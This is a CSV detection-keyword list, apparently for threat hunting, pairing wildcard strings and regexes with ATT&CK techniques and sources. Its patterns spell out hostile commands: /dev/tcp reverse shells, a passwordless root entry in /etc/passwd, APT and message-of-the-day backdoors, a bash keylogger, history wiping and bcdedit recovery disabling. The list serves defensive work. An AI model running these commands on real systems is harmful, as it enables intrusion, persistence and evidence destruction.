"*echo *::0:0::/root:/bin/bash* >>/etc/passwd*",".{0,1000}echo\s.{0,1000}\:\:0\:0\:\:\/root\:\/bin\/bash.{0,1000}\s\>\>\/etc\/passwd.{0,1000}","greyware_tool_keyword","bash","add a passwordless user ","T1136.001 - T1059.004 - T1078.004","TA0005 - TA0002 - TA0004","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A"
"*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*",".{0,1000}echo\s.{0,1000}APT\:\:Update\:\:Pre\-Invoke\s.{0,1000}nohup\sncat\s\-lvp\s.{0,1000}\s\-e\s\/bin\/bash\s.{0,1000}\s\>\s\/etc\/apt\/apt\.conf\.d\/.{0,1000}","greyware_tool_keyword","bash","Backdooring APT","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*",".{0,1000}echo\s.{0,1000}bash\s\-c\s.{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","greyware_tool_keyword","bash","Backdooring Message of the Day","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*exec /bin/sh 0</dev/tcp/*/*1>&0 2>&0*",".{0,1000}exec\s\/bin\/sh\s0\<\/dev\/tcp\/.{0,1000}\/.{0,1000}1\>\&0\s2\>\&0.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*",".{0,1000}exec\s5\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}.{0,1000}cat\s\<\&5\s\|\swhile\sread\sline.{0,1000}\sdo\s\$line\s2\>\&5\s\>\&5.{0,1000}\sdone.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*export HISTFILE=/dev/null*",".{0,1000}export\sHISTFILE\=\/dev\/null.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*export HISTFILESIZE=0*",".{0,1000}export\sHISTFILESIZE\=0.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*export HISTFILESIZE=0*",".{0,1000}export\sHISTFILESIZE\=0.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","N/A","greyware tool - risks of False positive !","10","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z"
"*HISTCONTROL=ignoredups:ignorespace*",".{0,1000}HISTCONTROL\=ignoredups\:ignorespace.{0,1000}","greyware_tool_keyword","bash","use a space in front of your bash command and it won't be logged with the following option","T1070.004 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive ! Misconfiguration","8","10","N/A","N/A","N/A","N/A"
"*history -c*",".{0,1000}history\s\-c.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*HISTORY=/dev/null*",".{0,1000}HISTORY\=\/dev\/null.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*ln -sf /dev/null *bash_history*",".{0,1000}ln\s\-sf\s\/dev\/null\s.{0,1000}bash_history.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","N/A","greyware tool - risks of False positive !","10","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z"
"*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*",".{0,1000}PROMPT_COMMAND\=.{0,1000}history\s\-a.{0,1000}\stail\s.{0,1000}\.bash_history\s\>\s\/dev\/tcp\/127\.0\.0\.1\/.{0,1000}","greyware_tool_keyword","bash","Bash Keylogger","T1059 - T1003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*rm .bash_history*",".{0,1000}rm\s\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*rm /home/*/.bash_history*",".{0,1000}rm\s\/home\/.{0,1000}\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*rm /root/.bash_history*",".{0,1000}rm\s\/root\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*set history +o*",".{0,1000}set\shistory\s\+o.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*sh >/dev/tcp/* <&1 2>&1*",".{0,1000}sh\s\>\/dev\/tcp\/.{0,1000}\s\<\&1\s2\>\&1.{0,1000}","greyware_tool_keyword","bash","Equation Group reverse shell method - simple bash reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*sh -i >& /dev/udp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/udp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*truncate -s0 *bash_history'*",".{0,1000}truncate\s\-s0\s.{0,1000}bash_history\'.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","N/A","greyware tool - risks of False positive !","10","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z"
"*unset HISTFILE*",".{0,1000}unset\sHISTFILE.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*",".{0,1000}history\s\-a.{0,1000}\stail\s\-n1\s\~\/\.bash_history\s\>\s\/dev\/tcp\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","bash keylogger","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*for i in {1..65535}*",".{0,1000}for\si\sin\s\{1\.\.65535\}.{0,1000}","greyware_tool_keyword","bash port scan","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Discovery","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://bashupload.com*",".{0,1000}https\:\/\/bashupload\.com.{0,1000}","greyware_tool_keyword","bashupload.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*bcdedit /set {default} bootstatuspolicy ignoreallfailures*",".{0,1000}bcdedit\s\/set\s\{default\}\sbootstatuspolicy\signoreallfailures.{0,1000}","greyware_tool_keyword","bcdedit","changes the boot status policy to ignore all failures","T1490","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*bcdedit /set {default} recoveryenabled No*",".{0,1000}bcdedit\s\/set\s\{default\}\srecoveryenabled\sNo.{0,1000}","greyware_tool_keyword","bcdedit","disables Windows automatic recovery","T1490","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*bcdedit* /set {default} bootstatuspolicy ignoreallfailures*",".{0,1000}bcdedit.{0,1000}\s\/set\s\{default\}\sbootstatuspolicy\signoreallfailures.{0,1000}","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.","T1542.003 - T1112 - T1484.001","TA0005 - TA0040?","N/A","LockBit - Snatch - Hive - Zola","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*bcdedit* /set {default} recoveryenabled No*",".{0,1000}bcdedit.{0,1000}\s\/set\s\{default\}\srecoveryenabled\sNo.{0,1000}","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.","T1542.003 - T1112 - T1484.001","TA0005 - TA0040?","N/A","LockBit - Snatch - Hive - Zola","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*FOR /F ""tokens=1,2*"" %%V IN ('bcdedit') DO SET adminTest=%%V*",".{0,1000}FOR\s\/F\s\""tokens\=1,2.{0,1000}\""\s\%\%V\sIN\s\(\'bcdedit\'\)\sDO\sSET\sadminTest\=\%\%V.{0,1000}","greyware_tool_keyword","bcedit","This checks whether the script has administrative access before continuing","T1070.003","TA0005","N/A","N/A","Defense Evasion","https://github.com/Lifka/hacking-resources/blob/7885f95676c3ba4b2ee79fbaf0f6797add892322/system-hacking-cheat-sheet.md?plain=1#L114","1","0","N/A","N/A","6","10","1836","169","2024-06-25T18:58:59Z","2021-02-27T10:17:42Z"
"*https://*.free.beeceptor.com*",".{0,1000}https\:\/\/.{0,1000}\.free\.beeceptor\.com.{0,1000}","greyware_tool_keyword","beeceptor.com","temporary public URL for your localhost + port combination - ideal for real-time testing - can be abused for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://beeceptor.com/local-tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*npgimkapccfidfkfoklhpkgmhgfejhbj*",".{0,1000}npgimkapccfidfkfoklhpkgmhgfejhbj.{0,1000}","greyware_tool_keyword","BelkaVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*ficajfeojakddincjafebjmfiefcmanc*",".{0,1000}ficajfeojakddincjafebjmfiefcmanc.{0,1000}","greyware_tool_keyword","Best VPN USA","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*binwalk*",".{0,1000}binwalk.{0,1000}","greyware_tool_keyword","binwalk","Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.","T1059.007 - T1060 - T1057 - T1142 - T1102.003","TA0002 - TA0005 - TA0009","N/A","N/A","Exploitation tool","https://github.com/ReFirmLabs/binwalk","1","0","N/A","greyware tool - risks of False positive !","N/A","10","10509","1509","2024-04-30T10:01:01Z","2013-11-15T20:45:40Z"
"*b^i^t^s^a^d^min^ /t^ra^n^s^f^e^r^ ^/^d^o^w^n^l^o^a^d*",".{0,1000}b\^i\^t\^s\^a\^d\^min\^\s\/t\^ra\^n\^s\^f\^e\^r\^\s\^\/\^d\^o\^w\^n\^l\^o\^a\^d.{0,1000}","greyware_tool_keyword","bitsadmin","bitsadmin obfuscation observed used by attackers","T1105 - T1071","TA0010 - TA0011 - TA0009 - TA00005","N/A","Black Basta - Hive - Revil - Conti - Medusa","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*bitsadmin /transfer debjob /download /priority normal \*\C$\Windows\*.dll",".{0,1000}bitsadmin\s\/transfer\sdebjob\s\/download\s\/priority\snormal\s\\.{0,1000}\\C\$\\Windows\\.{0,1000}\.dll","greyware_tool_keyword","bitsadmin","bitsadmin suspicious transfer","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","Black Basta - Hive - Revil - Conti - Medusa","Exploitation tool","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*\BitTorrent.exe*",".{0,1000}\\BitTorrent\.exe.{0,1000}","greyware_tool_keyword","bittorent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]bittorrent.com/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*neo4j console*",".{0,1000}neo4j\sconsole.{0,1000}","greyware_tool_keyword","BloodHound","he neo4j console command is used to start the Neo4j server in console mode. While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - Chimera - TA505","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","greyware tool - risks of False positive !","10","10","1878","321","2024-07-26T20:07:25Z","2018-02-26T14:44:20Z"
"*.beyondtrustcloud.com/session_complete*",".{0,1000}\.beyondtrustcloud\.com\/session_complete.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/bomgar-rep.exe*",".{0,1000}\/bomgar\-rep\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/bomgar-rep-installer.exe*",".{0,1000}\/bomgar\-rep\-installer\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/bomgar-scc-*.exe*",".{0,1000}\/bomgar\-scc\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/bomgar-scc.exe*",".{0,1000}\/bomgar\-scc\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\appdata\local\bomgar\bomgar-rep\*",".{0,1000}\\appdata\\local\\bomgar\\bomgar\-rep\\.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Bomgar-enum_cp-*",".{0,1000}\\Bomgar\-enum_cp\-.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\bomgar-rep.cache\*",".{0,1000}\\bomgar\-rep\.cache\\.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\bomgar-rep.exe*",".{0,1000}\\bomgar\-rep\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\bomgar-rep-installer.exe*",".{0,1000}\\bomgar\-rep\-installer\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\bomgar-scc-*.exe*",".{0,1000}\\bomgar\-scc\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\bomgar-scc.exe*",".{0,1000}\\bomgar\-scc\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\BOMGAR-SCC.EXE-*",".{0,1000}\\BOMGAR\-SCC\.EXE\-.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\cbhook-x86.dll*",".{0,1000}\\cbhook\-x86\.dll.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Run\Bomgar Support Reconnect*",".{0,1000}\\CurrentVersion\\Run\\Bomgar\sSupport\sReconnect.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Uninstall\Representative Console [eval-*",".{0,1000}\\CurrentVersion\\Uninstall\\Representative\sConsole\s\[eval\-.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\embedhook-x64.exe*",".{0,1000}\\embedhook\-x64\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\embedhook-x86.exe*",".{0,1000}\\embedhook\-x86\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\programdata\bomgar-scc-*",".{0,1000}\\programdata\\bomgar\-scc\-.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Bomgar Corporation</Data>*","\>Bomgar\sCorporation\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Remote Support Customer Client</Data>*",".{0,1000}\>Remote\sSupport\sCustomer\sClient\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Representative Console</Data>*",".{0,1000}\>Representative\sConsole\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*beyondtrustcloud.com\Software\Qt6*",".{0,1000}beyondtrustcloud\.com\\Software\\Qt6.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*bomgar-rdp.exe*",".{0,1000}bomgar\-rdp\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'Company'>BeyondTrust</Data>*",".{0,1000}\'Company\'\>BeyondTrust\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'Company'>bomgar</Data>*",".{0,1000}\'Company\'\>bomgar\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*eval-*.beyondtrustcloud.com*",".{0,1000}eval\-.{0,1000}\.beyondtrustcloud\.com.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*license.bomgar.com*",".{0,1000}license\.bomgar\.com.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
